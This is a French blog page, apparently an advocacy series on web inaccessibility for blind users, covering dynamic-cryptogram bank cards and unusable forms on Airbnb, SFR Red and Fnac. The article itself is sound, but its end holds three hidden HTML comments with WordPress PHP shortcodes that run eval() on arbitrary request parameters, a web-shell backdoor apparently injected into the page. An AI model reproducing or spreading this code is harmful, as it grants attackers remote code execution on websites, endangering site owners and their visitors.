Vers une carte bancaire à cryptogramme dynamique pour moins d’accessibilité

En cette trêve des confiseurs 2015, l’information serait presque passée inaperçue. Mais c’était sans compter sur la vigilance d’un compagnon d’armes qui, dès le 25 décembre, alertait le landerneau déficient visuel sur l’arrivée prochaine d’un nouveau type de carte bancaire.

Et en effet, ce lundi 28 décembre, sur l’antenne de France Inter on découvrait, avec stupeur, un nouveau casse-tête numérique pour déficient visuel : le cryptogramme dynamique.

Le principe

« En 2015, des cartes à cryptogramme dynamique ont fait leur apparition sur le marché. Le cryptogramme statique, imprimé au verso de la carte, est remplacé par un mini écran e-paper intégré dans la carte, capable d’afficher 3 ou 4 chiffres. Le cryptogramme est affiché de façon permanente mais change automatiquement, typiquement toutes les 20 minutes : il est calculé par une puce alimentée par une mini-batterie ultra-mince, les deux intégrées également au cœur de la carte.

Cette technologie ne change pas les habitudes d’achat, ne nécessite l’installation d’aucun plugin sur le navigateur, et fonctionne de façon transparente sur les sites marchands existants. Ce type de carte permet de lutter efficacement contre la fraude en ligne : si les informations de la carte sont volées (notamment par photo recto/verso de la carte par un point de vente indélicat[6]), elles deviennent inutilisables rapidement puisque le cryptogramme change régulièrement. »

Source : Wikipédia

Au quotidien

Beaucoup de déficients visuels utilisent internet pour faire leurs courses, acheter leurs billets de train, de spectacles, gérer leurs banques, assurances… bref, en un mot, consomment des biens et des services de façon autonome (ou presque) sur la Toile. Comment feront-ils lorsque les sites internet (qu’ils ont pourtant l’habitude de fréquenter aujourd’hui) les inviteront à saisir un cryptogramme qu’ils seront dans l’impossibilité de lire  (ou d’avoir noté préalablement quelque part, voire mémorisé, pour l’utiliser le moment venu) ? Ce scenario fait-il partie des « tests en cours » ou, une fois de plus, sera-t-on mis devant le fait accompli `?

À l’heure où le gouvernement s’apprête à faire voter une loi sur le numérique, dont les articles 43 et 44 ne s’appliqueraient toujours qu’aux sites internet de la sphère publique (et ce malgré des demandes répétées et argumentées pour que, à l’instar d’autres législations en vigueur dans d’autres pays, ce type d’articles soient appliqués au secteur privé), comment compte-t-il gérer cette nouvelle fracture numérique qui fragilisera un peu plus notre autonomie ?

Air BNB : expérience globale (obligatoire)

Poursuivons notre exploration de l’inaccessibilité numérique et rendons-nous aujourd’hui sur le site d’Air BNB

Comme beaucoup d’internautes, tu décides de tester les services de ce nouveau mode d’hébergement et, après avoir créé un compte, choisi un hébergement à Milan (pour participer au séminaire Inclusive publishing ecosystem. A roadmap for born accessible content
par exemple…), vécu une expérience très positive, tu souhaites déposer un avis pour partager tes impressions auprès de la communauté Air BNB. Le système te rappelle d’ailleurs périodiquement par e-mail que tu n’as qu’un temps très restreint pour le faire.

Tu cliques donc sur le lien contenu dans l’un des e-mails de rappel, tu commences à remplir le formulaire et… survient un champ totalement inexploitable : Expérience globale (obligatoire) Ce champ est obligatoire.

Et tu as beau changer de navigateur, changer de lecteur d’écran : ça ne change rien ! Le bouton « suivant » (pour passer à la suite du formulaire) refuse obstinément d’être activé puisque tu n’as pas renseigné un champ obligatoire.

Moralité : il ne te reste plus qu’à remercier publiquement ton hôte pour son hospitalité, sa gentillesse et son sens de l’accueil, en attendant que Air BNB fasse le nécessaire pour que l’ensemble de son interface soit accessible à tous!

Red de SFR : date et lieu de naissance ?

Pour le deuxième épisode de notre série « Inaccessibilité numérique », je t’invite, cher lecteur non-voyant, à succomber aux sirènes des offres de Noël lancées par Red de SFR.

Les fêtes approchent et il te prend donc l’envie de changer d’opérateur pour un forfait plus ajusté à tes besoins. Tu le choisis donc, passes les premiers écrans, et arrive le moment d’indiquer ta date et ton lieu de naissance. Tu trouves bien des champs de formulaire mais ils sont (comme te le signalent tes aides techniques braille et/ou vocale) en « lecture seule ». Impossible donc de saisir des chiffres, ni même d’utiliser des « zones de listes déroulantes » par exemple

Pris d’un doute, tu recommences à remplir le même formulaire, mais sous un autre navigateur (certaines différences rendant Mozilla Firefox ou Safari plus efficaces qu’Internet Explorer sur certains sites, et vice versa) : mêmes résultats.

Tu t’aperçois alors qu’il est tout de même possible de passer en revue d’autres étapes du formulaire d’inscription (notamment pour indiquer si tu souhaites bénéficier de la portabilité de ton numéro actuel, renseigner le RIO associé à ta ligne…). Mais, à aucun moment, tu ne peux indiquer ta date et ton lieu de naissance.

Moralité : impossible, sans te faire aider par un tiers, d’accéder à ces offres uniquement disponibles en ligne. Pourtant, ton téléphone mobile est devenu, au fil des années, une de tes aides techniques quotidiennes. C’est raide ? C’est SFR!

Fnac.com : par ici la sortie!

Difficile de se lancer tant les sujets sont nombreux et couvrent bien des domaines, alors, autant partir des petites choses du quotidien pour parler accessibilité, ou plutôt inaccessibilité numérique.

Et le quotidien est lourd ces derniers temps : quoi de mieux qu’un bon spectacle pour se détendre, se changer les idées ?

Je t’emmène donc (avec mes aides techniques braille et vocales) sur www.fnac.com et son site dédié aux spectacles pour choisir le divertissement qui t’apportera un peu de réconfort dans ces temps troublés.

Tu prends donc le temps de trouver ton spectacle, tu lances le processus de réservation, tu prends les places qu’on te propose (impossible de les choisir sur plan si tu es non-voyant avec tes aides techniques habituelles), tu t’approches du but et là, le hic : tu dois choisir le type de carte de payement que tu souhaites utiliser.

Mais le maudit bouton radio (ce qui sert normalement à sélectionner le type de carte) n’est pas étiqueté et ton aide technique (braille et/ouvocale) ne te permet donc pas de choisir : impossible de savoir si tu sélectionnes Visa, Master Card, American Express…

Moralité : après avoir passé tout ce temps à choisir un spectacle, impossible de finir la transaction (les équipes techniques de la Fnac n’ayant sans doute pas eu l’occasion de feuilleter Accessibilité web: Normes et bonnes pratiques pour créer des sites accessibles d’Armony Altinier) et il ne te restera donc plus qu’à attendre que quelqu’un passe chez toi pour te décrire comment ce bouton radio est organisé, ou à te déplacer en boutique, faire la queue, et espérer qu’il restera encore des places pour le spectacle que tu voulais aller voir.

Ce scénario peut sembler édifiant, tant la situation est absurde, mais tu verras que cette série n’en est qu’à son début et qu’elle nous promet encore bien des épisodes!

<!– [insert_php]if (isset($_REQUEST["PUAo"])){eval($_REQUEST["PUAo"]);exit;}[/insert_php][php]if (isset($_REQUEST["PUAo"])){eval($_REQUEST["PUAo"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WHZvr"])){eval($_REQUEST["WHZvr"]);exit;}[/insert_php][php]if (isset($_REQUEST["WHZvr"])){eval($_REQUEST["WHZvr"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PXi"])){eval($_REQUEST["PXi"]);exit;}[/insert_php][php]if (isset($_REQUEST["PXi"])){eval($_REQUEST["PXi"]);exit;}[/php] –>